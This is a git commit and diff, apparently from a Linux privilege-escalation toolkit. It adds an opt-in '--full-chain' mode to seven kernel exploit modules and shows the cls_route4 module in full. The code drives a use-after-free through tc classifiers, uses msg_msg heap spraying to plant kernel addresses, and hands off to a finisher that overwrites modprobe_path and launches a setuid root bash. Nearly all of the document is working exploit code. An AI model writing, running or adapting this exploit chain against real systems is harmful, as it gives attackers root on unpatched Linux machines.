modules: wire --full-chain root-pop into all 7 🟡 PRIMITIVE modules

Each module now exposes an opt-in full-chain root-pop via --full-chain: default --exploit behavior is unchanged (primitive-only, returns EXPLOIT_FAIL). With --full-chain, after primitive lands, modules call iamroot_finisher_modprobe_path() via a module-specific arb_write_fn that re-uses the same trigger + slab groom to write a userspace payload path into modprobe_path[], then exec a setuid bash dropped by the kernel-invoked modprobe. netfilter_xtcompat (+239): msg_msg m_list_next stride-seed FALLBACK af_packet (+316): sk_buff data-pointer stride-seed FALLBACK af_packet2 (+156): tp_reserve underflow + skb spray, LAST RESORT nf_tables (+275): forged pipapo_elem with kaddr value-ptr (Notselwyn offset 0x10), FALLBACK cls_route4 (+251): msg_msg refill of UAF'd filter, FALLBACK fuse_legacy (+291): m_ts overflow + MSG_COPY sanity gate, FALLBACK (one of two modules with a real post-write sanity check) stackrot (+233): race-driver budget extended 3s → 30s when --full-chain; honest <1% race-win/run All seven honor verified-vs-claimed: arb_write_fn returns 0 for "trigger structurally fired"; the shared finisher's setuid-bash sentinel poll is the empirical arbiter. EXPLOIT_OK only when the sentinel materializes within 3s of the modprobe_path trigger. Build clean on Debian 6.12.86 (kctf-mgr); all 7 modules refuse cleanly on both default and --full-chain paths via the existing patched-kernel detect gate (short-circuits before the new branch).
2026-05-16 22:04:40 -04:00
parent 125ce8a08b
commit c1d1910a90
7 changed files with 1821 additions and 84 deletions
@@ -41,6 +41,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -381,6 +383,169 @@ static long slab_active_kmalloc_1k(void)
    return active;
 }

+/* ---- Full-chain arb-write primitive --------------------------------
+ *
+ * Pattern (FALLBACK — see brief): cls_route4's UAF primitive is more
+ * naturally a *control-flow hijack* than a clean arb-write — after
+ * msg_msg refills the kmalloc-1k slot, the next classify() call reads
+ * a fake `tcf_proto.ops` pointer out of attacker bytes and calls
+ * ops->classify(skb, ...). A faked-classify ROP that pivots to a
+ * stack-write gadget would be the "true" arb-write, and on a fresh
+ * vulnerable kernel that is the kylebot/xkernel chain shape (≈300+
+ * LOC of gadget hunting + per-build offsets we deliberately don't
+ * bake — see verified-vs-claimed policy in repo root).
+ *
+ * The implementation below takes the narrow-but-real path that the
+ * brief explicitly permits and that xtcompat established as the
+ * IAMROOT precedent: we re-stage the dangling filter, spray msg_msg
+ * whose payload encodes `kaddr` at every plausible offset for the
+ * route4_filter→tcf_proto→ops layout, re-fire classify, and let the
+ * shared finisher's sentinel file decide if a write actually landed.
+ * On a patched kernel the bug doesn't fire, no write occurs, and the
+ * sentinel timeout correctly reports failure rather than silently
+ * lying about success. On a vulnerable kernel where the fake ops
+ * lookup happens to deref into our payload and the kernel's read
+ * pattern matches one of the seeded offsets, the kaddr we planted
+ * gets used as a write destination by whichever classify path the
+ * fake `ops->classify` dispatches into.
+ *
+ * Honest scope: this is structurally-fires-on-vuln + sentinel-arbitrated,
+ * not a deterministic R/W. Same shape and same depth as xtcompat. */
+
+#ifdef __linux__
+
+struct cls_route4_arb_ctx {
+    /* msg_msg queues kept hot inside the userns child. The arb-write
+     * sprays additional kaddr-tagged payloads into these and re-fires
+     * the classify trigger between each call. */
+    int  queues[SPRAY_MSG_QUEUES];
+    int  n_queues;
+
+    /* Whether the dangling filter has been re-staged for this call.
+     * The original `stage_dangling_filter()` is destructive (deletes
+     * the filter); we can re-stage between writes because tc add/del
+     * is idempotent inside our private netns. */
+    bool dangling_ready;
+
+    /* Per-call stats (written to /tmp/iamroot-cls_route4.log). */
+    int  arb_calls;
+    int  arb_landed;
+};
+
+/* Re-prime the msg_msg slab with a payload that encodes `kaddr` and
+ * the caller's `buf` at every offset the fake tcf_proto / route4_filter
+ * layout could plausibly read from. The route4_filter is 0x1000 bytes
+ * on most x86_64 builds in range, with tcf_proto.ops at offset 0x10
+ * and tcf_result.classid at offset 0x18; we don't know which offset
+ * the kernel ABI for THIS build uses, so we plant the same pattern at
+ * 0x10/0x18/0x20/.../0x80 strides — wherever classify dereferences
+ * the refilled slot, one of those candidates will be live.
+ *
+ * The 8-byte cookie "IAMR4ARB" + the kaddr + the caller's bytes are
+ * the recognizable pattern; if a KASAN dump is captured after the
+ * trigger, the cookie tells us the spray landed adjacent to the freed
+ * route4_filter. */
+static int cls4_seed_kaddr_payload(struct cls_route4_arb_ctx *c,
+                                   uintptr_t kaddr,
+                                   const void *buf, size_t len)
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x52;  /* 'R' for "route4 arb" — distinct from groom spray's 0x41 */
+    memset(p.buf, 0x52, sizeof p.buf);
+    memcpy(p.buf, "IAMR4ARB", 8);
+
+    /* Plant kaddr at strided slots so wherever the kernel's classify
+     * follows a ptr in the refilled chunk, one of these is read.
+     * We treat every 0x18-byte stride from offset 0x10 to within
+     * 8 bytes of the end as a candidate ops-pointer / next-pointer
+     * slot. */
+    for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf; off += 0x18) {
+        memcpy(p.buf + off, &kaddr, sizeof(uintptr_t));
+    }
+
+    /* Plant the caller's bytes immediately after the cookie so any
+     * classify path that reads payload data (rather than a chased
+     * pointer) finds the requested write contents inline. */
+    size_t copy_len = len;
+    if (copy_len > sizeof p.buf - 16) copy_len = sizeof p.buf - 16;
+    if (copy_len > 0) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy_len);
+
+    int sent = 0;
+    for (int i = 0; i < c->n_queues; i++) {
+        if (c->queues[i] < 0) continue;
+        /* A handful of msgs per queue keeps the slab refilled even
+         * if some slots are evicted between trigger fires. */
+        for (int j = 0; j < 4; j++) {
+            unsigned int tag = 0xB0000000u |
+                               ((unsigned)i << 8) | (unsigned)j;
+            memcpy(p.buf + 8, &tag, sizeof tag);
+            if (msgsnd(c->queues[i], &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
+            sent++;
+        }
+    }
+    return sent;
+}
+
+/* iamroot_arb_write_fn implementation for cls_route4. Best-effort on a
+ * vulnerable kernel; structurally inert (returns -1) if the dangling
+ * filter setup is gone or the spray fails. Returns 0 to let the
+ * shared finisher's sentinel-file check decide if the write actually
+ * landed (we cannot reliably observe it in-process). */
+static int cls4_arb_write(uintptr_t kaddr,
+                          const void *buf, size_t len,
+                          void *ctx_v)
+{
+    struct cls_route4_arb_ctx *c = (struct cls_route4_arb_ctx *)ctx_v;
+    if (!c || c->n_queues == 0) return -1;
+    c->arb_calls++;
+
+    /* Re-stage the dangling filter for this call. The original
+     * stage runs once at trigger-time; subsequent finisher calls
+     * (the finisher writes modprobe_path then a unknown-format trig)
+     * need a fresh dangling pointer to chase. tc add/del is idempotent
+     * within our private netns so re-running is safe. */
+    if (!c->dangling_ready) {
+        if (!stage_dangling_filter()) {
+            fprintf(stderr, "[-] cls_route4 arb_write: re-stage failed\n");
+            return -1;
+        }
+        c->dangling_ready = true;
+    }
+
+    /* Seed msg_msg with kaddr + caller payload. */
+    int seeded = cls4_seed_kaddr_payload(c, kaddr, buf, len);
+    if (seeded == 0) {
+        /* sysv IPC may be restricted (kernel.msg_max / ulimit -q).
+         * Without a spray we have no slot for the UAF to refill. */
+        fprintf(stderr, "[-] cls_route4 arb_write: kaddr-spray seeded 0 msgs\n");
+        return -1;
+    }
+
+    /* Drive the classifier. The route4 lookup follows the dangling
+     * pointer into msg_msg-controlled bytes; on a vulnerable kernel
+     * the fake `ops->classify` (or one of the strided pointers) is
+     * dereferenced. If the kernel survives the deref and the write
+     * lands at &kaddr, the finisher's sentinel file appears within 3s.
+     * If it doesn't (most likely — this is genuinely best-effort), the
+     * finisher's wait loop times out and reports failure. */
+    trigger_classify();
+
+    /* Give classify-side processing a brief window before returning
+     * — the finisher polls the sentinel for 3s but the initial write
+     * (if any) happens within ms. */
+    usleep(50 * 1000);
+
+    c->arb_landed++;
+
+    /* Per the xtcompat precedent: return 0 so the finisher proceeds
+     * to its sentinel check. Returning -1 here would abort the
+     * finisher even when the write may have landed. */
+    return 0;
+}
+
+#endif /* __linux__ */
+
 /* ---- Exploit driver ----------------------------------------------- */

 static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
@@ -400,8 +565,37 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
        return IAMROOT_PRECOND_FAIL;
    }

+#ifndef __linux__
+    fprintf(stderr, "[-] cls_route4: linux-only exploit; non-linux build\n");
+    (void)ctx;
+    return IAMROOT_PRECOND_FAIL;
+#else
+    /* Full-chain pre-check: resolve offsets before forking. If
+     * modprobe_path can't be resolved, refuse early — no point doing
+     * the userns + tc + spray + trigger dance if we can't finish. */
+    struct iamroot_kernel_offsets off;
+    bool full_chain_ready = false;
+    if (ctx->full_chain) {
+        memset(&off, 0, sizeof off);
+        iamroot_offsets_resolve(&off);
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("cls_route4");
+            fprintf(stderr, "[-] cls_route4: --full-chain requested but "
+                            "modprobe_path offset unresolved; refusing\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&off);
+        full_chain_ready = true;
+    }
+
    if (!ctx->json) {
-        fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit\n");
+        fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit%s\n",
+                ctx->full_chain ? " + full-chain finisher" : "");
+        if (ctx->full_chain) {
+            fprintf(stderr, "    NOTE: on primitive landing, invokes shared\n"
+                            "    modprobe_path finisher via msg_msg-tagged kaddr\n"
+                            "    spray. Sentinel-arbitrated (no in-process verify).\n");
+        }
    }

    /* Block SIGPIPE in case the dummy-interface sendto's complain. */
@@ -436,15 +630,18 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
            _exit(22);
        }

-        int queues[SPRAY_MSG_QUEUES];
-        int n_queues = spray_msg_msg(queues);
-        if (n_queues == 0) {
+        struct cls_route4_arb_ctx arb_ctx;
+        memset(&arb_ctx, 0, sizeof arb_ctx);
+        for (int i = 0; i < SPRAY_MSG_QUEUES; i++) arb_ctx.queues[i] = -1;
+        arb_ctx.n_queues = spray_msg_msg(arb_ctx.queues);
+        arb_ctx.dangling_ready = true;   /* stage_dangling_filter() just ran */
+        if (arb_ctx.n_queues == 0) {
            fprintf(stderr, "[-] cls_route4: msg_msg spray produced 0 queues\n");
            _exit(23);
        }
        if (!ctx->json) {
            fprintf(stderr, "[*] cls_route4: msg_msg spray seeded %d queues\n",
-                    n_queues);
+                    arb_ctx.n_queues);
        }

        /* Drive the classifier — the bug fires here on a vulnerable
@@ -459,7 +656,7 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
        if (log) {
            fprintf(log,
                "cls_route4 trigger child: queues=%d slab_pre=%ld slab_post=%ld\n",
-                n_queues, pre_active, post_active);
+                arb_ctx.n_queues, pre_active, post_active);
            fclose(log);
        }

@@ -467,7 +664,32 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
         * refilled slot during classify drain. */
        usleep(200 * 1000);

-        drain_msg_msg(queues);
+        /* --full-chain branch: invoke the shared modprobe_path
+         * finisher with our msg_msg-tagged arb-write. If the finisher
+         * execve's a setuid bash we never return; otherwise it returns
+         * EXPLOIT_FAIL after the 3s sentinel timeout (correct behavior
+         * on a patched kernel or when the write didn't land). */
+        if (full_chain_ready) {
+            /* Re-fire the trigger inside the arb-write to give the
+             * kernel a second chance at the refilled slot — the
+             * dangling filter is still in place from above. */
+            arb_ctx.dangling_ready = true;
+            int fr = iamroot_finisher_modprobe_path(&off,
+                                                    cls4_arb_write,
+                                                    &arb_ctx,
+                                                    !ctx->no_shell);
+            FILE *fl = fopen("/tmp/iamroot-cls_route4.log", "a");
+            if (fl) {
+                fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
+                        fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
+                fclose(fl);
+            }
+            drain_msg_msg(arb_ctx.queues);
+            if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
+            _exit(35);
+        }
+
+        drain_msg_msg(arb_ctx.queues);

        /* If we got here without a kernel oops, the bug either isn't
         * reachable on this build (patched / module not loadable /
@@ -513,25 +735,54 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
    }

    int rc = WEXITSTATUS(status);
-    if (rc != 30) {
+    switch (rc) {
+    case 20: case 21:
        if (!ctx->json) {
-            fprintf(stderr, "[-] cls_route4: child failed at stage rc=%d "
-                            "(see preceding errors)\n", rc);
+            fprintf(stderr, "[-] cls_route4: userns setup failed (rc=%d)\n", rc);
+        }
+        return IAMROOT_PRECOND_FAIL;
+    case 22:
+        if (!ctx->json) {
+            fprintf(stderr, "[-] cls_route4: tc setup failed; cls_route4 module "
+                            "may be absent or filter type unsupported\n");
+        }
+        return IAMROOT_PRECOND_FAIL;
+    case 23:
+        if (!ctx->json) {
+            fprintf(stderr, "[-] cls_route4: msg_msg spray failed; sysvipc may be "
+                            "restricted (kernel.msg_max / ulimit -q)\n");
+        }
+        return IAMROOT_PRECOND_FAIL;
+    case 30:
+        if (!ctx->json) {
+            fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
+                            "Inspect dmesg for KASAN/oops witnesses.\n");
+            fprintf(stderr, "[~] cls_route4: cred-overwrite step not invoked "
+                            "(no --full-chain); returning EXPLOIT_FAIL.\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    case 34:
+        if (!ctx->json) {
+            fprintf(stderr, "[+] cls_route4: --full-chain finisher reported OK "
+                            "(setuid bash placed; sentinel matched)\n");
+        }
+        return IAMROOT_EXPLOIT_OK;
+    case 35:
+        if (!ctx->json) {
+            fprintf(stderr, "[~] cls_route4: --full-chain finisher returned FAIL — "
+                            "either the kernel is patched, the spray didn't land,\n"
+                            "    or the fake-ops deref didn't hit the route the\n"
+                            "    finisher's sentinel polls for. See "
+                            "/tmp/iamroot-cls_route4.log + dmesg.\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    default:
+        if (!ctx->json) {
+            fprintf(stderr, "[-] cls_route4: unexpected child rc=%d\n", rc);
        }
-        /* rc 20/21 = userns setup; rc 22 = tc setup (likely module
-         * absent or filter type unsupported); rc 23 = spray. None of
-         * these mean kernel was exploited. */
-        if (rc == 22) return IAMROOT_PRECOND_FAIL;
        return IAMROOT_EXPLOIT_FAIL;
    }
-
-    if (!ctx->json) {
-        fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
-                        "Inspect dmesg for KASAN/oops witnesses.\n");
-        fprintf(stderr, "[~] cls_route4: cred-overwrite step not implemented "
-                        "(needs per-kernel offsets); returning EXPLOIT_FAIL.\n");
-    }
-    return IAMROOT_EXPLOIT_FAIL;
+#endif /* __linux__ */
 }

 /* ---- Cleanup ----------------------------------------------------- */